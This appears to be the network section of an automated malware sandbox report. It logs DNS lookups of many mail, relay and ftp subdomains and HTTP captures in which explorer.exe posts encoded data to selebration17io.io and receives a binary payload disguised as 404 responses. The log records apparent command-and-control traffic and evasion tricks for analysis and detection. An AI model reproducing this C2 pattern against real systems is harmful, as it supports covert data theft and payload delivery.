                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.454509020 CET1.1.1.1192.168.2.60x9d04No error (0)star-mini.c10r.facebook.com157.240.14.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.535603046 CET1.1.1.1192.168.2.60xf650Server failure (2)sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.535662889 CET1.1.1.1192.168.2.60xf650Server failure (2)sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.535752058 CET1.1.1.1192.168.2.60xf650Server failure (2)sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:10.535763025 CET1.1.1.1192.168.2.60xf650Server failure (2)sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.315850019 CET1.1.1.1192.168.2.60x622cNo error (0)lookaside.fbsbx.comscontent.xx.fbcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.315850019 CET1.1.1.1192.168.2.60x622cNo error (0)scontent.xx.fbcdn.net31.13.88.13A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:11.482183933 CET1.1.1.1192.168.2.60x688bName error (3)ftp.oferta.senasofiaplus.edu.cononenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.142138004 CET1.1.1.1192.168.2.60x4ca8Name error (3)relay.ventas.officeinsumos.com.arnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.415524960 CET1.1.1.1192.168.2.60x1f37No error (0)store.steampowered.com23.54.200.86A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.667645931 CET1.1.1.1192.168.2.60x9f68Name error (3)mail.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.688052893 CET1.1.1.1192.168.2.60x6190Name error (3)relay.sport.autoplay.cloudnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.689420938 CET1.1.1.1192.168.2.60x7ebdName error (3)relay.tls21.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.710283995 CET1.1.1.1192.168.2.60xfbdbName error (3)relay.ssl-es.hoteles.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.795185089 CET1.1.1.1192.168.2.60xc17aName error (3)mailgate.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.854029894 CET1.1.1.1192.168.2.60x7dc0No error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.854072094 CET1.1.1.1192.168.2.60x7dc0No error (0)student.emis.gov.eg41.33.126.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:12.861531973 CET1.1.1.1192.168.2.60xc784Name error (3)mailgate.auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.064629078 CET1.1.1.1192.168.2.60x13d9Name error (3)smtp.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.127717018 CET1.1.1.1192.168.2.60x283aName error (3)relay.auth.cambridgelms.orgnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.166239977 CET1.1.1.1192.168.2.60x3029Name error (3)relay.app.jobpet.com.brnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.170181990 CET1.1.1.1192.168.2.60xb3e1Name error (3)imap.student.emis.gov.egnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.170233965 CET1.1.1.1192.168.2.60xb3e1Name error (3)imap.student.emis.gov.egnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.241436005 CET1.1.1.1192.168.2.60x5557Name error (3)relay.mitextoescolar.mineduc.clnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.241482019 CET1.1.1.1192.168.2.60x5557Name error (3)relay.mitextoescolar.mineduc.clnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.374030113 CET1.1.1.1192.168.2.60x510dNo error (0)ww12.chainmine.io084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.374030113 CET1.1.1.1192.168.2.60x510dNo error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.374030113 CET1.1.1.1192.168.2.60x510dNo error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.375757933 CET1.1.1.1192.168.2.60x510dNo error (0)ww12.chainmine.io084725.parkingcrew.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.375757933 CET1.1.1.1192.168.2.60x510dNo error (0)084725.parkingcrew.net76.223.26.96A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.375757933 CET1.1.1.1192.168.2.60x510dNo error (0)084725.parkingcrew.net13.248.148.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.379864931 CET1.1.1.1192.168.2.60x7f43Name error (3)mailgate.us04web.zoom.usnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.404930115 CET1.1.1.1192.168.2.60x8c45No error (0)ftp.chainmine.io64.91.249.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.454030037 CET1.1.1.1192.168.2.60x189dName error (3)mailgate.student.emis.gov.egnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:13.677431107 CET1.1.1.1192.168.2.60x717Name error (3)ftp.srienlinea.sri.gob.ecnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:14.165654898 CET1.1.1.1192.168.2.60x4d0Name error (3)ftp.mw.redsa.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:14.165678978 CET1.1.1.1192.168.2.60x4d0Name error (3)ftp.mw.redsa.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:17.508646965 CET1.1.1.1192.168.2.60x76e6Server failure (2)ssh.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:17.508661985 CET1.1.1.1192.168.2.60x76e6Server failure (2)ssh.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:17.508714914 CET1.1.1.1192.168.2.60x76e6Server failure (2)ssh.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:17.508724928 CET1.1.1.1192.168.2.60x76e6Server failure (2)ssh.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:19.489275932 CET1.1.1.1192.168.2.60x7dd8Server failure (2)mail.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:19.489291906 CET1.1.1.1192.168.2.60x7dd8Server failure (2)mail.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:19.489300966 CET1.1.1.1192.168.2.60x7dd8Server failure (2)mail.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:19.489311934 CET1.1.1.1192.168.2.60x7dd8Server failure (2)mail.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:19.489322901 CET1.1.1.1192.168.2.60x7dd8Server failure (2)mail.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:19.489597082 CET1.1.1.1192.168.2.60x5676Server failure (2)ftp.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:19.489608049 CET1.1.1.1192.168.2.60x5676Server failure (2)ftp.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:19.489617109 CET1.1.1.1192.168.2.60x5676Server failure (2)ftp.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:19.489628077 CET1.1.1.1192.168.2.60x5676Server failure (2)ftp.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:19.489636898 CET1.1.1.1192.168.2.60x5676Server failure (2)ftp.sii.ittlahuac.edu.mxnonenoneA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                                                                                                HTTP Packets

                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                0192.168.2.64970691.215.85.120804004C:\Windows\explorer.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:17.879051924 CET284OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://dvtcfovqblmr.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 197
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:17.879110098 CET197OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a1 19 ba 8a 14 62 cc d6 4f 96 a1 a3 37 ff
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO7lEY%d^&[f}Yb%VT-#_.,)~&=FL0&PVh3JQ9K-''(#lK
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:18.136255026 CET194INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 37 0d 0a 03 00 00 00 1f 3d 53 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 7=S0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:18.160465956 CET285OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://wnpeibcbuxpve.com/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 237
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:18.160612106 CET237OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a2 19 ba 8a 14 62 cd d6 4f 96 fc a9 2c fb
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO,}-1<`LChczYI:VvU-g56>)25(:a#WN`EA"^la"5%m=4r%P"Rs,~VG(oQjM
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:18.416982889 CET604INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 36 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 73 65 6c 65 62 72 61 74 69 6f 6e 31 37 69 6f 2e 69 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.56 (Debian) Server at selebration17io.io Port 80</address></body></html>0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:18.420413017 CET286OUTPOST /index.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Referer: http://xubqnicouxkctp.org/
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 204
                                                                                                                                                                                                                                                                                                                                                                Host: selebration17io.io
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:18.420413017 CET204OUTData Raw: 48 9d 8b c9 4b 61 57 21 57 03 52 2f 7b ac 23 c1 2f 6d ed 11 f9 19 d8 ac b5 1a ab 80 71 f4 d1 97 fc af 8e c0 00 45 e2 b2 a2 2e 6a 71 82 83 f0 0f 98 4a 2c 2c 50 c5 3b 7d ef 83 66 87 fe 3d be f5 42 21 9b c6 a2 19 bb 8a 14 62 cd d6 4f 96 ea cc 26 d8
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: HKaW!WR/{#/mqE.jqJ,,P;}f=B!bO&y%>EzN?&<[dtVkG70Hn;!B~2S|#2bSJ.~tn!%]c7Rzz
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:18.680599928 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:12:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 66 36 36 0d 0a 00 00 b4 60 13 d4 0c 1a 40 10 16 30 80 b7 d3 87 84 4f 15 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 65 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 55 9e 7e 29 fc 53 68 0b 8e 22 f5 86 55 d4 a3 86 04 12 fc 2a 54 e9 30 16 c7 37 f2 78 06 0d d2 1f db de fa e0 fd 87 71 cd 37 33 33 99 11 0c 45 7c 0f 57 44 8d e8 be 3c 50 35 11 fe 08 32 b9 7f 18 64 3d 28 2c 87 6a dd d6 be db 43 17 5c 53 a6 cd f6 4d 55 64 b1 ce 5b fd 51 19 d0 b3 4e 2a b1 15 22 18 cb 33 4f 72 3e 15 31 0b 5a a3 06 83 3a 56 2f cb 00 23 be 42 15 c7 07 53 53 fa cb 1f 9e 1d 09 52 2b e1 a3 15 7b 1a 45 f7 ff 78 2d c2 db d4 77 11 13 bf 1e e1 92 24 08 4f c5 03 bb 91 a1 39 64 de f5 69 39 8e 17 1e 45 af 9a a5 44 c9 a0 c1 b9 dd 7a 0d 90 4e 19 e0 2c 95 a9 18 1a f5 96 be 25 51 61 9a d4 3e 7c 88 28 c8 48 6b a1 c0 4a 9a 03 fd ec 9e aa 7b ac 87 2f bd 61 0d 30 62 bf aa 35 fd f8 12 6c 33 6c 29 7c 0a 8d c7 fd e4 0e a4 eb 7e 71 eb 80 f5 1a 68 9b 4a d8 37 da a9 37 4f 79 82 ae 35 b6 04 4c 75 46 ad f3 57 3b 2a b9 72 ee cc 23 b2 75 0e 31 79 92 90 f7 df f5 ec e7 52 2b 4c e0 fe 60 9d 72 17 70 bb d6 91 24 3c 27 d4 29 b1 9f 33 c9 cc 46 d9 48 15 ac af eb d9 55 3d af ba 68 92 0e ff 9d 3f 7f 55 00 79 00 1a 4d 07 e7 ac 04 c8 30 43 40 77 fb c1 9b 84 e7 3d 66 f1 8a 64 b1 1d 30 12 51 8c 70 17 4b 81 6b df 8e c2 01 e8 24 31 28 cc e0 0e 92 b6 d7 52 4a 80 1b 6f e3 c3 29 32 28 e7 5b 1e 54 ab 1e 26 7d 11 ee c3 ce 57 a3 4c 1d 85 1f f4 5c 68 f1 b2 5f 6b 81 6c 6d 4c 81 cb e6 1f e4 a6 8d 2f 9f 10 bd d9 b0 99 03 99 8a cd e4 7f 74 79 50 6d 43 cc b9 8b 8b a1 62 7a 17 b2 fe ae 90 6b 9a 56 39 d1 03 40 28 d2 ae 06 1f d0 db fd 7a 8f fe 6b e3 cd d0 d9 37 00 80 e3 1c c9 20 f5 52 68 c4 3a f6 63 b9 82 7b 50 bf e5 7e 2d bc 70 d4 03 6b 3b 98 76 72 0f ca 82 4d 72 2e 9f 96 ce ec 35 98 c3 a7 0d a8 ca d4 1f 29 43 03 b2 27 70 10 7b 3a 1d f8 50 d0 ac 88 c1 64 36 33 25 01 d8 a9 c3 76 9f 2f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 4e 93 81 59 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d fd 90 ab 77 e5 83 8b 45 1b 3f af 0d c6 0f ef f9 7d d8 ef fe af 8c e8 01 47 dc cc c5 bb 8e d9 d6 0a f3 3f 20 25 25 8c dd 63 cd 51 02 af 68 bf 99 c1 fc 7b 6e c5 71 68 72 c8 ad f4 ae b0 a0 53 fb 14 73 a4 40 42 c1 6f 02 ed b1 88 81 4d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1f66`@0O}q4 IJ%9Wd8IkDJ8P>e%y^\.Kij}S.;vKs6(p_6k)|pU~)Sh"U*T07xq733E|WD<P52d=(,jC\SMUd[QN*"3Or>1Z:V/#BSSR+{Ex-w$O9di9EDzN,%Qa>|(HkJ{/a0b5l3l)|~qhJ77Oy5LuFW;*r#u1yR+L`rp$<')3FHU=h?UyM0C@w=fd0QpKk$1(RJo)2([T&}WL\h_klmL/tyPmCbzkV9@(zk7 Rh:c{P~-pk;vrMr.5)C'p{:Pd63%v/#wNYRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9*nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=wE?}G? %%cQh{nqhrSs@BoM
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:18.680651903 CET1286INData Raw: f9 70 56 f6 21 39 f3 3d 68 1b 41 d5 f8 a8 78 e5 dd e3 ca b5 a8 3b 28 fe 9d 2a 66 00 8a 45 5c 43 a3 56 6b fa ac b6 d2 61 fb f3 e0 01 0f 61 ae b6 f4 fa 6e 7b 6d 36 4d 8b b9 13 4b 66 e2 40 ba 61 c1 fd c5 80 a3 88 3a 49 5b 07 2b f9 1f 46 ef 82 b2 f5
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: pV!9=hAx;(*fE\CVkaan{m6MKf@a:I[+FgY\Di`^KAvC(ma^c)Zdj;2:<XaCa.J4o\wR$f6W7kX=Y1!0$d!gYkS~
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:18.680680990 CET1286INData Raw: 3a af 96 b1 16 e1 d3 b0 75 80 dc 8f 31 7e 0b 09 6e b0 54 82 d5 2c 53 a9 fa e5 de 3c 22 7c b5 81 08 81 e3 55 fd 22 cc 3a 67 24 ea d2 1e e9 e3 59 d9 c2 cb a3 0d 5a 6c 94 37 bc f6 29 0c 9a 10 5d 41 e6 78 fd e6 10 d7 59 97 45 4d ca 6a 53 cf 82 6e ea
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: :u1~nT,S<"|U":g$YZl7)]AxYEMjSn+]im?kNs:UNXw$#)f}PIXD0t<|Eiv$HU:ipt"2a{!g{$-ERg8{XT&%kYi*H,wf+f<1d
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:18.680727005 CET1286INData Raw: f2 6c b3 af 99 c2 4d 3d a0 fb 89 58 2f 7d 0e 81 3e 57 d1 16 e8 56 36 a8 d5 2e bd 9a c7 36 5b be 69 b6 d3 9f d0 e8 cc b0 ac f1 a6 05 ff 21 f0 18 cf 78 85 c7 27 61 68 e7 a4 c5 e8 bd c9 c0 ad 01 76 fa a1 cb d6 3f e2 32 7a 7a 5a 5f 7d 54 16 29 e7 9b
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: lM=X/}>WV6.6[i!x'ahv?2zzZ_}T)>'XWUzO'#cR/_[tn6:T,%!X=D:3LsGP:C\h;\~b|2I"xZdt@ZQL"|N.Yz<~O)(>
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:18.680757046 CET1286INData Raw: 60 72 34 8c c9 4d 93 a7 7a ea 5a 0c ab a2 b5 e3 84 12 7f 93 c5 d9 43 c0 e3 48 cd 69 82 2e c0 c9 f3 b3 6b 0c 69 0e f8 f2 d9 0c 09 54 9f 36 94 2d 3d 20 d8 3e f7 70 e1 ca 1a ae c1 2c 14 86 d8 d1 cc 1d 20 4a 36 41 34 d0 ac 9d db 6d c8 98 e4 37 1c 7a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: `r4MzZCHi.kiT6-= >p, J6A4m7zNw{x%-n\JuuQ+T lR]@w]h7~{Aie3ff/L(E#5lI|6>Z|:3s<4H`RTuwEBbY[L,
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:12:18.680785894 CET1286INData Raw: e7 3f 56 33 8b b0 33 15 15 85 35 42 2e bd 1a b5 ce 74 88 48 0a 9b 6e 5d ac c7 36 8a 2e 4a f9 c6 53 79 21 88 0a e6 c3 b3 4d 04 ed e5 35 8e 87 45 f7 a7 0b 8c bd d6 e8 f9 a6 03 56 b2 b4 d1 3e 92 50 83 9f 97 ef 40 c8 58 94 b0 33 3c 3a d3 ff 5c 87 85
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ?V335B.tHn]6.JSy!M5EV>P@X3<:\+Z$Ii~TiJoZ.QcU2kN:qHWdsd[/.-r;^qYcT}O[:Bfr|%3Z`ub~{|k@ 40vnm
